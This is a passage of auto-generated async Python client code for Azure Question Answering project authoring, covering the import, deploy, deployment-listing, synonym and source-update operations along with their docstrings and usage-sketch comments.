asset_kind: Optional[str] = None,
**kwargs: Any
) -> AsyncLROPoller[JSON]:
"""Import project assets.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/import
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param options: Project assets that need to be imported. Is either a model type or an IO
type. Default value is None.
:type options: JSON or IO
:keyword file_format: Knowledge base Import or Export format. Known values are: "json", "tsv",
and "excel". Default value is "json".
:paramtype file_format: str
:keyword asset_kind: Kind of the asset of the project. Known values are: "qnas" and "synonyms".
Default value is None.
:paramtype asset_kind: str
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncLROBasePolling. Pass in False
for this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns JSON object
:rtype: ~azure.core.polling.AsyncLROPoller[JSON]
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# response body for status code(s): 200
response == {
"createdDateTime": "2020-02-20 00:00:00", # Required.
"jobId": "str", # Required.
"lastUpdatedDateTime": "2020-02-20 00:00:00", # Required.
"status": "str", # Job Status. Required. Known values are: "notStarted",
"running", "succeeded", "failed", "cancelled", "cancelling", and
"partiallyCompleted".
"errors": [
{
"code": "str", # One of a server-defined set of error codes.
Required. Known values are: "InvalidRequest", "InvalidArgument",
"Unauthorized", "Forbidden", "NotFound", "ProjectNotFound",
"OperationNotFound", "AzureCognitiveSearchNotFound",
"AzureCognitiveSearchIndexNotFound", "TooManyRequests",
"AzureCognitiveSearchThrottling",
"AzureCognitiveSearchIndexLimitReached", "InternalServerError", and
"ServiceUnavailable".
"message": "str", # A human-readable representation of the
error. Required.
"details": [
...
],
"innererror": {
"code": "str", # One of a server-defined set of
error codes. Required. Known values are: "InvalidRequest",
"InvalidParameterValue", "KnowledgeBaseNotFound",
"AzureCognitiveSearchNotFound", "AzureCognitiveSearchThrottling", and
"ExtractionFailure".
"message": "str", # Error message. Required.
"details": {
"str": "str" # Optional. Error details.
},
"innererror": ...,
"target": "str" # Optional. Error target.
},
"target": "str" # Optional. The target of the error.
}
],
"expirationDateTime": "2020-02-20 00:00:00" # Optional.
}
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = kwargs.pop("params", {}) or {}
content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str]
cls = kwargs.pop("cls", None) # type: ClsType[JSON]
polling = kwargs.pop("polling", True) # type: Union[bool, AsyncPollingMethod]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = await self._import_assets_initial( # type: ignore
project_name=project_name,
options=options,
file_format=file_format,
asset_kind=asset_kind,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
if polling is True:
polling_method = cast(
AsyncPollingMethod,
AsyncLROBasePolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs),
) # type: AsyncPollingMethod
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
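# A usage sketch for begin_import_assets with a JSON body shaped like the
# input template in the docstrings above; the QnA content below is purely
# illustrative:
#
#     options = {
#         "assets": {
#             "qnas": [{"answer": "Yes.", "questions": ["Can I import QnAs?"]}]
#         },
#         "metadata": {"language": "en"},  # "language" is required by the template
#     }
#     poller = await client.begin_import_assets("my-project", options)
#     job = await poller.result()  # job["status"] reports the import outcome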
async def _deploy_project_initial(self, project_name: str, deployment_name: str, **kwargs: Any) -> Optional[JSON]:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = kwargs.pop("params", {}) or {}
cls = kwargs.pop("cls", None) # type: ClsType[Optional[JSON]]
request = build_deploy_project_request(
project_name=project_name,
deployment_name=deployment_name,
api_version=self._config.api_version,
headers=_headers,
params=_params,
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
deserialized = None
response_headers = {}
if response.status_code == 200:
if response.content:
deserialized = response.json()
else:
deserialized = None
if response.status_code == 202:
response_headers["Operation-Location"] = self._deserialize(
"str", response.headers.get("Operation-Location")
)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
@distributed_trace_async
async def begin_deploy_project(
self, project_name: str, deployment_name: str, **kwargs: Any
) -> AsyncLROPoller[JSON]:
"""Deploy project to production.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/deploy-project
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param deployment_name: The name of the specific deployment of the project to use. Required.
:type deployment_name: str
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncLROBasePolling. Pass in False
for this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns JSON object
:rtype: ~azure.core.polling.AsyncLROPoller[JSON]
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# response body for status code(s): 200
response == {
"deploymentName": "str", # Optional. Name of the deployment.
"lastDeployedDateTime": "2020-02-20 00:00:00" # Optional. Represents the
project last deployment date-time.
}
"""
_headers = kwargs.pop("headers", {}) or {}
_params = kwargs.pop("params", {}) or {}
cls = kwargs.pop("cls", None) # type: ClsType[JSON]
polling = kwargs.pop("polling", True) # type: Union[bool, AsyncPollingMethod]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = await self._deploy_project_initial( # type: ignore
project_name=project_name,
deployment_name=deployment_name,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
if polling is True:
polling_method = cast(
AsyncPollingMethod,
AsyncLROBasePolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs),
) # type: AsyncPollingMethod
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
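# A usage sketch for begin_deploy_project; "production" is a placeholder
# deployment name:
#
#     poller = await client.begin_deploy_project("my-project", "production")
#     deployment = await poller.result()
#     print(deployment["lastDeployedDateTime"])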
@distributed_trace
def list_deployments(
self, project_name: str, *, top: Optional[int] = None, skip: Optional[int] = None, **kwargs: Any
) -> AsyncIterable[JSON]:
"""List all deployments of a project.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/list-deployments
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:keyword top: The maximum number of resources to return from the collection. Default value is
None.
:paramtype top: int
:keyword skip: An offset into the collection of the first resource to be returned. Default
value is None.
:paramtype skip: int
:return: An iterator-like instance of JSON object
:rtype: ~azure.core.async_paging.AsyncItemPaged[JSON]
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# response body for status code(s): 200
response == {
"deploymentName": "str", # Optional. Name of the deployment.
"lastDeployedDateTime": "2020-02-20 00:00:00" # Optional. Represents the
project last deployment date-time.
}
"""
_headers = kwargs.pop("headers", {}) or {}
_params = kwargs.pop("params", {}) or {}
cls = kwargs.pop("cls", None) # type: ClsType[JSON]
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_deployments_request(
project_name=project_name,
top=top,
skip=skip,
api_version=self._config.api_version,
headers=_headers,
params=_params,
)
path_format_arguments = {
"Endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
else:
# make call to next link with the client's api-version
_parsed_next_link = urlparse(next_link)
_next_request_params = case_insensitive_dict(parse_qs(_parsed_next_link.query))
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest("GET", urljoin(next_link, _parsed_next_link.path), params=_next_request_params)
path_format_arguments = {
"Endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
return request
async def extract_data(pipeline_response):
deserialized = pipeline_response.http_response.json()
list_of_elem = deserialized["value"]
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.get("nextLink", None), AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
return pipeline_response
return AsyncItemPaged(get_next, extract_data)
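# list_deployments returns an AsyncItemPaged, so results are consumed with
# "async for"; the same pattern applies to list_synonyms, list_sources, and
# list_qnas below. The paging keywords are optional:
#
#     async for deployment in client.list_deployments("my-project", top=10):
#         print(deployment["deploymentName"])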
@distributed_trace
def list_synonyms(
self, project_name: str, *, top: Optional[int] = None, skip: Optional[int] = None, **kwargs: Any
) -> AsyncIterable[JSON]:
"""Gets all the synonyms of a project.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/get-synonyms
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:keyword top: The maximum number of resources to return from the collection. Default value is
None.
:paramtype top: int
:keyword skip: An offset into the collection of the first resource to be returned. Default
value is None.
:paramtype skip: int
:return: An iterator-like instance of JSON object
:rtype: ~azure.core.async_paging.AsyncItemPaged[JSON]
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# response body for status code(s): 200
response == {
"alterations": [
"str" # Collection of word alterations. Required.
]
}
"""
_headers = kwargs.pop("headers", {}) or {}
_params = kwargs.pop("params", {}) or {}
cls = kwargs.pop("cls", None) # type: ClsType[JSON]
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_synonyms_request(
project_name=project_name,
top=top,
skip=skip,
api_version=self._config.api_version,
headers=_headers,
params=_params,
)
path_format_arguments = {
"Endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
else:
# make call to next link with the client's api-version
_parsed_next_link = urlparse(next_link)
_next_request_params = case_insensitive_dict(parse_qs(_parsed_next_link.query))
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest("GET", urljoin(next_link, _parsed_next_link.path), params=_next_request_params)
path_format_arguments = {
"Endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
return request
async def extract_data(pipeline_response):
deserialized = pipeline_response.http_response.json()
list_of_elem = deserialized["value"]
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.get("nextLink", None), AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
return pipeline_response
return AsyncItemPaged(get_next, extract_data)
@overload
async def update_synonyms( # pylint: disable=inconsistent-return-statements
self, project_name: str, synonyms: JSON, *, content_type: str = "application/json", **kwargs: Any
) -> None:
"""Updates all the synonyms of a project.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/update-synonyms
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param synonyms: All the synonyms of a project. Required.
:type synonyms: JSON
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:return: None
:rtype: None
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
synonyms = {
"nextLink": "str", # Optional.
"value": [
{
"alterations": [
"str" # Collection of word alterations. Required.
]
}
]
}
"""
@overload
async def update_synonyms( # pylint: disable=inconsistent-return-statements
self, project_name: str, synonyms: IO, *, content_type: str = "application/json", **kwargs: Any
) -> None:
"""Updates all the synonyms of a project.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/update-synonyms
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param synonyms: All the synonyms of a project. Required.
:type synonyms: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:return: None
:rtype: None
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def update_synonyms( # pylint: disable=inconsistent-return-statements
self, project_name: str, synonyms: Union[JSON, IO], **kwargs: Any
) -> None:
"""Updates all the synonyms of a project.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/update-synonyms
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param synonyms: All the synonyms of a project. Is either a model type or an IO type. Required.
:type synonyms: JSON or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:return: None
:rtype: None
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = kwargs.pop("params", {}) or {}
content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str]
cls = kwargs.pop("cls", None) # type: ClsType[None]
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(synonyms, (IO, bytes)):
_content = synonyms
else:
_json = synonyms
request = build_update_synonyms_request(
project_name=project_name,
content_type=content_type,
api_version=self._config.api_version,
json=_json,
content=_content,
headers=_headers,
params=_params,
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
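# A usage sketch for update_synonyms with a body shaped like the JSON input
# template in the docstring above; the alterations are illustrative:
#
#     synonyms = {
#         "value": [
#             {"alterations": ["qna maker", "qnamaker"]},
#         ]
#     }
#     await client.update_synonyms("my-project", synonyms)  # None on success (HTTP 204)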
@distributed_trace
def list_sources(
self, project_name: str, *, top: Optional[int] = None, skip: Optional[int] = None, **kwargs: Any
) -> AsyncIterable[JSON]:
"""Gets all the sources of a project.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/get-sources
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:keyword top: The maximum number of resources to return from the collection. Default value is
None.
:paramtype top: int
:keyword skip: An offset into the collection of the first resource to be returned. Default
value is None.
:paramtype skip: int
:return: An iterator-like instance of JSON object
:rtype: ~azure.core.async_paging.AsyncItemPaged[JSON]
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# response body for status code(s): 200
response == {
"sourceKind": "str", # Supported source types. Required. Known values are:
"file" and "url".
"sourceUri": "str", # URI location for the file or url. Required.
"contentStructureKind": "str", # Optional. Content structure type for
sources. "unstructured"
"displayName": "str", # Optional. Friendly name of the Source.
"lastUpdatedDateTime": "2020-02-20 00:00:00", # Optional. Date-time when the
QnA was last updated.
"source": "str" # Optional. Unique source identifier. Name of the file if
it's a 'file' source; otherwise, the complete URL if it's a 'url' source.
}
"""
_headers = kwargs.pop("headers", {}) or {}
_params = kwargs.pop("params", {}) or {}
cls = kwargs.pop("cls", None) # type: ClsType[JSON]
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_sources_request(
project_name=project_name,
top=top,
skip=skip,
api_version=self._config.api_version,
headers=_headers,
params=_params,
)
path_format_arguments = {
"Endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
else:
# make call to next link with the client's api-version
_parsed_next_link = urlparse(next_link)
_next_request_params = case_insensitive_dict(parse_qs(_parsed_next_link.query))
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest("GET", urljoin(next_link, _parsed_next_link.path), params=_next_request_params)
path_format_arguments = {
"Endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
return request
async def extract_data(pipeline_response):
deserialized = pipeline_response.http_response.json()
list_of_elem = deserialized["value"]
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.get("nextLink", None), AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
return pipeline_response
return AsyncItemPaged(get_next, extract_data)
async def _update_sources_initial(
self, project_name: str, sources: Union[List[JSON], IO], **kwargs: Any
) -> Optional[JSON]:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = kwargs.pop("params", {}) or {}
content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str]
cls = kwargs.pop("cls", None) # type: ClsType[Optional[JSON]]
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(sources, (IO, bytes)):
_content = sources
else:
_json = sources
request = build_update_sources_request(
project_name=project_name,
content_type=content_type,
api_version=self._config.api_version,
json=_json,
content=_content,
headers=_headers,
params=_params,
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
deserialized = None
response_headers = {}
if response.status_code == 200:
if response.content:
deserialized = response.json()
else:
deserialized = None
if response.status_code == 202:
response_headers["Operation-Location"] = self._deserialize(
"str", response.headers.get("Operation-Location")
)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
@overload
async def begin_update_sources(
self, project_name: str, sources: List[JSON], *, content_type: str = "application/json", **kwargs: Any
) -> AsyncLROPoller[AsyncIterable[JSON]]:
"""Updates the sources of a project.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/update-sources
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param sources: Update sources parameters of a project. Required.
:type sources: list[JSON]
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncLROBasePolling. Pass in False
for this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns an iterator-like instance of JSON object
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.core.async_paging.AsyncItemPaged[JSON]]
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
sources = [
{
"op": "str", # Update operation type for assets. Required. Known
values are: "add", "delete", and "replace".
"value": {
"sourceKind": "str", # Supported source types. Required.
Known values are: "file" and "url".
"sourceUri": "str", # URI location for the file or url.
Required.
"contentStructureKind": "str", # Optional. Content structure
type for sources. "unstructured"
"displayName": "str", # Optional. Friendly name of the
Source.
"refresh": bool, # Optional. Boolean flag used to refresh
data from the Source.
"source": "str" # Optional. Unique source identifier. Name
of the file if it's a 'file' source; otherwise, the complete URL if it's
a 'url' source.
}
}
]
# response body for status code(s): 200, 202
response == {
"sourceKind": "str", # Supported source types. Required. Known values are:
"file" and "url".
"sourceUri": "str", # URI location for the file or url. Required.
"contentStructureKind": "str", # Optional. Content structure type for
sources. "unstructured"
"displayName": "str", # Optional. Friendly name of the Source.
"lastUpdatedDateTime": "2020-02-20 00:00:00", # Optional. Date-time when the
QnA was last updated.
"source": "str" # Optional. Unique source identifier. Name of the file if
it's a 'file' source; otherwise, the complete URL if it's a 'url' source.
}
"""
@overload
async def begin_update_sources(
self, project_name: str, sources: IO, *, content_type: str = "application/json", **kwargs: Any
) -> AsyncLROPoller[AsyncIterable[JSON]]:
"""Updates the sources of a project.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/update-sources
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param sources: Update sources parameters of a project. Required.
:type sources: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncLROBasePolling. Pass in False
for this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns an iterator-like instance of JSON object
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.core.async_paging.AsyncItemPaged[JSON]]
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# response body for status code(s): 200, 202
response == {
"sourceKind": "str", # Supported source types. Required. Known values are:
"file" and "url".
"sourceUri": "str", # URI location for the file or url. Required.
"contentStructureKind": "str", # Optional. Content structure type for
sources. "unstructured"
"displayName": "str", # Optional. Friendly name of the Source.
"lastUpdatedDateTime": "2020-02-20 00:00:00", # Optional. Date-time when the
QnA was last updated.
"source": "str" # Optional. Unique source identifier. Name of the file if
it's a 'file' source; otherwise, the complete URL if it's a 'url' source.
}
"""
@distributed_trace_async
async def begin_update_sources(
self, project_name: str, sources: Union[List[JSON], IO], **kwargs: Any
) -> AsyncLROPoller[AsyncIterable[JSON]]:
"""Updates the sources of a project.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/update-sources
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param sources: Update sources parameters of a project. Is either a list type or an IO type.
Required.
:type sources: list[JSON] or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncLROBasePolling. Pass in False
for this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns an iterator-like instance of JSON object
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.core.async_paging.AsyncItemPaged[JSON]]
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# response body for status code(s): 200, 202
response == {
"sourceKind": "str", # Supported source types. Required. Known values are:
"file" and "url".
"sourceUri": "str", # URI location for the file or url. Required.
"contentStructureKind": "str", # Optional. Content structure type for
sources. "unstructured"
"displayName": "str", # Optional. Friendly name of the Source.
"lastUpdatedDateTime": "2020-02-20 00:00:00", # Optional. Date-time when the
QnA was last updated.
"source": "str" # Optional. Unique source identifier. Name of the file if
it's a 'file' source; otherwise, the complete URL if it's a 'url' source.
}
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = kwargs.pop("params", {}) or {}
content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str]
cls = kwargs.pop("cls", None) # type: ClsType[JSON]
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(sources, (IO, bytes)):
_content = sources
else:
_json = sources
def prepare_request(next_link=None):
if not next_link:
request = build_update_sources_request(
project_name=project_name,
content_type=content_type,
api_version=self._config.api_version,
json=_json,
content=_content,
headers=_headers,
params=_params,
)
path_format_arguments = {
"Endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
else:
# make call to next link with the client's api-version
_parsed_next_link = urlparse(next_link)
_next_request_params = case_insensitive_dict(parse_qs(_parsed_next_link.query))
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest("GET", urljoin(next_link, _parsed_next_link.path), params=_next_request_params)
path_format_arguments = {
"Endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
return request
async def extract_data(pipeline_response):
deserialized = pipeline_response.http_response.json()
list_of_elem = deserialized["value"]
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.get("nextLink", None), AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
return pipeline_response
polling = kwargs.pop("polling", True) # type: Union[bool, AsyncPollingMethod]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = await self._update_sources_initial( # type: ignore
project_name=project_name,
sources=sources,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
async def internal_get_next(next_link=None):
if next_link is None:
return pipeline_response
return await get_next(next_link)
return AsyncItemPaged(internal_get_next, extract_data)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
if polling is True:
polling_method = cast(
AsyncPollingMethod,
AsyncLROBasePolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs),
) # type: AsyncPollingMethod
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
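# A usage sketch for begin_update_sources. Note that the poller's result is
# itself an AsyncItemPaged of the updated sources; the URL below is a
# placeholder:
#
#     sources = [
#         {
#             "op": "add",
#             "value": {
#                 "sourceKind": "url",
#                 "sourceUri": "https://contoso.example/faq",
#                 "displayName": "Contoso FAQ",
#             },
#         }
#     ]
#     poller = await client.begin_update_sources("my-project", sources)
#     async for src in await poller.result():
#         print(src["source"])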
@distributed_trace
def list_qnas(
self,
project_name: str,
*,
source: Optional[str] = None,
